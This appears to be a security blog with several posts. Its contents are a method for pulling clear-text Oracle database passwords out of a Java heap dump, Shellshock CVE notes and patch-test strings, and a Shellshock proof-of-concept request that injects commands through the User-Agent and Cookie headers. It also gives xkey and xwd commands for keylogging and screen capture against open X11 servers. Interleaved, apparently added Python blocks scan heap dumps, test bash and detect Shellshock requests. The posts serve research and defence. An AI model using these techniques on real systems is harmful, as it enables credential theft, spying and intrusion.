
19 Apr 2016

Searching for DB passwords in Java memory | Searching for Oracle database passwords in Java VM

Here is a small trick for finding (clear-text) Oracle DB passwords in the memory of a Java process. The programs used come from Oracle's standard JDK.

List the Java programs using jps:
$ jps
32488 MainClassName
1945 Jps
The jps command gives the list of "instrumented" Java processes. The other (more inclusive) approach would be to use something like pgrep java.

Once we have the PID, we can use jmap to generate a memory image:
$ jmap -heap:format=b 32488
Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created
Once the image is created, it can be analyzed using jhat. This command starts a web server that allows the analysis.
[t903335@slave1 ~]$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]
WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
Connecting to the port mentioned above with a web browser (http://127.0.0.1:7000/) gives the list of Java classes found in memory. At the bottom of the page there is a link titled Execute Object Query Language (OQL) query which takes us to /oql. This page allows running targeted searches of the memory.

After a bit of searching, I noticed that to find the password sent to the DB, it is enough to run this OQL query:
OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")
If this JDBC driver is used by the Java program, we get a link to this class. Clicking on this link, we have the option of viewing its instances by clicking on the link Instances: Exclude subclasses. On the next page we will see something like:

oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.

Clicking on the link to the instance brings up a page showing the values of the various attributes of the object in question. Among these attributes are password, userName and database (URI). Of course, all the values are the original values (in the clear)!

I still need to look into how this continuous exposure of the password in memory, inside Oracle's JDBC driver itself, can be avoided. I hope it is only an implementation error (by the developer using the driver).

OQL reference: https://visualvm.java.net/oqlhelp.html
__________________________

Below is a trick for finding clear text passwords in Java VM memory when a Java program uses (one of) the JDBC driver(s) from Oracle (ojdbc6.jar, I think). The commands used come from the standard Oracle JDK.

To list java programs, use jps:
$ jps
32488 MainClassName
1945 Jps
The jps command lists the instrumented java processes. Another approach to get a more inclusive list would be to use something like pgrep java.

Once we have the PID, we can use jmap to dump the java process memory to disk:
$ jmap -heap:format=b 32488
Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created
Once we have the memory dump, we can analyze it using jhat. This command also starts a web server for the analyst.
$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]
WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.
When connecting to that port with a web browser (http://127.0.0.1:7000/), we obtain a list of java classes found in memory. At the bottom of the page, there's a link Execute Object Query Language (OQL) query that brings us to /oql. This page allows searching for structured memory content.

After a bit of tinkering, I figured out that to find the database password, all I needed to do was run this OQL query:
OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")
If this JDBC driver is used in the java program, we obtain a link to this class. When clicking that link, we can view its instance(s) by clicking on Instances: Exclude subclasses. In the following page, we get something like:
oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.
When clicking on the link for the instance, we get another page with different attributes and corresponding values within the object. As part of these, we find the attributes named password, userName and database (URI). Of course, all of those values are in the clear!

Now, I need to find a way to avoid this continuous exposure in memory when using Oracle drivers. There's hopefully a better way to use it or simply a better driver altogether...

More details on OQL: https://visualvm.java.net/oqlhelp.html
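One check that follows naturally from the above is whether a credential is still present in a dump once a fix has been attempted. The following is an added example, not code from the post: it scans a heap.bin for a known password in both the UTF-8 and UTF-16 forms a JDK 8 String can take (a plain `strings heap.bin` only finds the first); SAMPLE_DUMP and the password Tr0ub4dor are constructed.

```python
# Added example, not from the post: scan a jmap heap dump for a known credential.
# On the JDK 8 JVM shown above (25.66-b17) a String's contents live in a char[]
# (UTF-16BE in HPROF), so an ASCII-only search can miss the value; a byte[]
# produced by encoding the password holds it as UTF-8/Latin-1, and JDK 9+ compact
# strings store Latin-1 text one byte per char. Both forms are checked here.
# SAMPLE_DUMP and the password are constructed, not a real dump.

def secret_patterns(secret: str) -> dict:
    """Byte forms the secret can take inside a dump."""
    return {
        "utf-8": secret.encode("utf-8"),          # byte[] copy / compact string
        "utf-16be": secret.encode("utf-16-be"),   # String.value char[] copy
    }

def find_secret(dump: bytes, secret: str) -> dict:
    """Return {encoding: [byte offsets]} for every occurrence of secret in dump."""
    hits = {}
    for name, pattern in secret_patterns(secret).items():
        offsets = []
        pos = dump.find(pattern)
        while pos != -1:
            offsets.append(pos)
            pos = dump.find(pattern, pos + 1)
        hits[name] = offsets
    return hits

def scan_dump_file(path: str, secret: str) -> dict:
    """Wrapper for a real dump, e.g. scan_dump_file("heap.bin", password)."""
    with open(path, "rb") as fh:
        return find_secret(fh.read(), secret)

# Constructed stand-in for heap.bin: HPROF magic, padding, a UTF-16BE copy of the
# password (offset 35), padding, then a UTF-8 copy (offset 61).
SAMPLE_DUMP = (
    b"JAVA PROFILE 1.0.2\x00" + b"\x00" * 16
    + "Tr0ub4dor".encode("utf-16-be")
    + b"\x00" * 8
    + b"Tr0ub4dor"
)

if __name__ == "__main__":
    for enc, offs in find_secret(SAMPLE_DUMP, "Tr0ub4dor").items():
        state = "still present" if offs else "not found"
        print(f"{enc}: {state} {offs}")
```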

29 Sept 2014

Current Intel on BashBug / Shellshock

CVEs
CVE-2014-6271  (1st bug report)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Red Hat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Red Hat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michal Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michal Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in "mainstream" Linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

Botnets

Network Detection (IDS, IPS, WAF)
  • VRT and EmergingThreats posts showing this is being addressed for Snort
  • ...
Exploits

Bash Test Strings
Command line tests to verify proper patching (and to somehow use in our detections):
  • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
  • Later patch: foo='() { echo Not patched; }' bash -c foo
  • (search for more...)
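The two test strings above wrapped into a patch check, as an added example that is not part of the original post: it runs each string against the local bash and reports whether the injected body still executes. It assumes only that a bash binary is on PATH.

```python
# Added example, not from the post: run the two test strings above against the
# local bash and report whether each still fires. A patched bash prints only the
# -c argument (test 1) or "foo: command not found" (test 2); an unpatched one
# prints "Not patched". Requires a bash binary on PATH; nothing else is assumed.
import shutil
import subprocess

# test name -> (environment variable, value, command run under bash -c)
TESTS = {
    # Original report (CVE-2014-6271): command appended after the function body.
    "CVE-2014-6271 trailing command": ("x", "() { :;}; echo Not patched", "echo This is a test."),
    # Later fix: a function must no longer be imported from a plain variable name.
    "function import from plain variable": ("foo", "() { echo Not patched; }", "foo"),
}

def run_test(bash: str, var: str, value: str, command: str) -> str:
    """Run `bash -c command` with only PATH and the test variable set; return all output."""
    env = {"PATH": "/usr/bin:/bin", var: value}
    proc = subprocess.run([bash, "-c", command], env=env, capture_output=True, text=True)
    return proc.stdout + proc.stderr

def is_vulnerable(output: str) -> bool:
    """The injected body ran if its marker reached the output."""
    return "Not patched" in output

def check_bash() -> dict:
    """Return {test name: True if vulnerable}; an empty dict means no bash was found."""
    bash = shutil.which("bash")
    if bash is None:
        return {}
    return {name: is_vulnerable(run_test(bash, *spec)) for name, spec in TESTS.items()}

if __name__ == "__main__":
    results = check_bash()
    if not results:
        print("bash not installed: nothing to check")
    for name, vuln in results.items():
        print(f"{name}: {'VULNERABLE' if vuln else 'patched'}")
```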

25 Sept 2014

Test pour Shellshock/BashBug | POC for ShellShock / BashBug CVE-2014-6271

Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result via a GET parameter though (either via URL-encoding or by just encoding spaces), but I just wanted to prove the point for myself quickly...

Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat echo.sh
#!/bin/bash
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?";
echo "Output from env:"
env

GET request from attacker

GET /cgi-bin/echo.sh HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive

GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:
[...]
HTTP_USER_AGENT=() { :
}
HTTP_COOKIE=() { :
}
_=/usr/bin/env

Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent
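Detection logic for the header vector shown above, as an added example that is not part of the original post: it flags any header or query value whose once-decoded form starts with the bash function-definition prefix `() {` that HTTP_USER_AGENT and HTTP_COOKIE carry in the env output. SAMPLE_REQUEST is constructed from the post's request with a URL-encoded query variant added.

```python
# Added example, not from the post: detection logic for the header injection
# above. Every Shellshock vector has to begin with the bash function-definition
# prefix "() {", whatever command follows, so that prefix is what we match,
# after one round of URL-decoding. SAMPLE_REQUEST is constructed from the
# post's own request plus an encoded query parameter (the GET variant it mentions).
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")

def is_shellshock_value(value: str) -> bool:
    """True if the value, decoded once, starts like a bash function definition."""
    return bool(SHELLSHOCK_PREFIX.search(unquote_plus(value)))

def scan_request(raw: str) -> list:
    """Return (location, value) pairs for suspicious query parameters and headers."""
    findings = []
    lines = raw.splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    for key, val in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if is_shellshock_value(val):
            findings.append((f"query:{key}", val))
    for line in lines[1:]:
        if not line:
            break                         # blank line ends the header block
        if ":" not in line:
            continue
        name, val = line.split(":", 1)
        if is_shellshock_value(val):
            findings.append((f"header:{name.strip()}", val.strip()))
    return findings

# Constructed sample: the post's request, plus the same "() { :;}; echo Hacked"
# prefix URL-encoded into a query parameter.
SAMPLE_REQUEST = "\r\n".join([
    "GET /cgi-bin/echo.sh?q=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20Hacked HTTP/1.1",
    "Host: localhost",
    "User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie",
    "Connection: keep-alive",
])

if __name__ == "__main__":
    for where, value in scan_request(SAMPLE_REQUEST):
        print(f"{where}: {value}")
```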

11 Jan 2013

Attacking an X11 server without authentication (after xhost +)

Here are a few commands to exploit an open X11 server:

Remote key capture
$ xkey IP:0.0

NB:
  • The source code for xkey.c can be found here
  • Use 0.0 for port 6000, 1.0 for port 6001...
 
Screen capture:
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


References:

19 Jul 2010

Microsoft "0 day" vulnerability exploitable via Metasploit!

The Microsoft shortcut vulnerability can now be exploited via Metasploit!
It is important, more than ever, to apply the least-privilege rules for Windows users or to apply Microsoft's recommendations.
The Microsoft shortcut vulnerability can now be exploited by using Metasploit!
It is now important, more than ever, to apply the least privilege rules for Windows users or to follow the specific Microsoft workaround.

30 Nov 2009

Click fraud

An SC Magazine article explains what Click Fraud is and why advertising companies must be vigilant.
It is an attack in which one or more people or programs repeatedly click on an online advertisement to inflate the count of referrals billable to the advertising companies' clients.
This attack lends itself very well to a botnet architecture, such as the Bahama Botnet.
Increasingly, click fraud seems to be underpinned by botnets, according to a report from Click Forensics, an online advertising auditing service. In fact, botnets accounted for nearly 43 percent of all click fraud in the third quarter of this year, the study, released Thursday, found. This was a big jump in the use of botnets, marking a doubling in two years, and an increase of 27.5 percent over the same quarter last year.
One botnet, a highly sophisticated click-fraud network of zombie computers dubbed the “Bahama botnet,” was implicated in a recent scareware incident involving NYTimes.com display ads. The source of that attack was traced back to the Ukrainian Fan Club, a known group of online fraudsters, which redirected traffic through 200,000 parked domains located in the Bahamas.
Click fraud involves a person, or script, clicking on an ad repeatedly to drive up countable hits that are paid for by unknowing advertisers. “Botnets perpetrating click fraud and other online schemes continue to grow in number and sophistication,” Paul Pellman, CEO of Click Forensics, said in a statement. “Advertisers and ad providers need to be especially vigilant about such activity as we enter the competitive search marketing holiday season.”
via Botnet use in click fraud skyrockets – SC Magazine US.